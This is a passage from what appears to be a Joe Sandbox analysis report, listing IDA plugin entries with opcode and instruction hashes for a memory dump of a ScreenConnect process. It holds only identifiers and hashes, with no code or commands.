                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 813ea7f229339a0cda4366f5a4716059bd0cc2031eabdcc514a944ca6f9d06c8
                                                                                                                                                                                                  • Instruction ID: e4207f92f86999d4cd96d0a6e4446a8f2fb30ee33c10d696a14a7cd46cfdda74
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 813ea7f229339a0cda4366f5a4716059bd0cc2031eabdcc514a944ca6f9d06c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BE0926150E7D51FD7479B3488A88E57F70EE1322031900EBD485CF1B3E5148589C742
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 263a4416fdf541539609f3f745c1a58cabe80e9b8cddcf8cebb99bd59a3107ad
                                                                                                                                                                                                  • Instruction ID: 6172cc718c1dc590cc77848cf1b39fe67aa1796608b39ee2badb1f589db17bb9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 263a4416fdf541539609f3f745c1a58cabe80e9b8cddcf8cebb99bd59a3107ad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E0C21698C61343FF6C217678913BDA0E2BF443D1F09407EE40DC90C6DD9C9C81C592
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: fecc7a7694de0a30e4db1f49af43b0f6e7903998f0d07c43b16c152d9028f2b7
                                                                                                                                                                                                  • Instruction ID: 05f1eb57bb9e60f3292a19d0d314d4f0825d05098fc5da9407af72c90d95d87f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fecc7a7694de0a30e4db1f49af43b0f6e7903998f0d07c43b16c152d9028f2b7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57C09201BAC82D0A4494A29C38426AD4182EBC876078426B7E91EC734ED94C9CC343C2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5e02d41f2b01c4d47cf7d8c871b91f2ba83b98751474a060e31547c279c3e682
                                                                                                                                                                                                  • Instruction ID: 6f73ffb9ee0280468ec2b2f4be47a532fb375d13ca8f39ecb577947276d0870b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e02d41f2b01c4d47cf7d8c871b91f2ba83b98751474a060e31547c279c3e682
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9C09B10E99D474EF364FB25C44117D15737F88281B504435E01D87187CD3C6502D545
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                                  • Instruction ID: 1d044ef359d12fa1652950ca064b26eb7c5e9f5d53a9c097d53dffe21cdf1835
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7e964dda257bf75a141f77fb187e27f4e9d8a10aaff2beac9dd30ee2a5fe83
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08A00211ECDD1649E2716655404117D04722F556C0B204136E01D96187DD2C6E83E596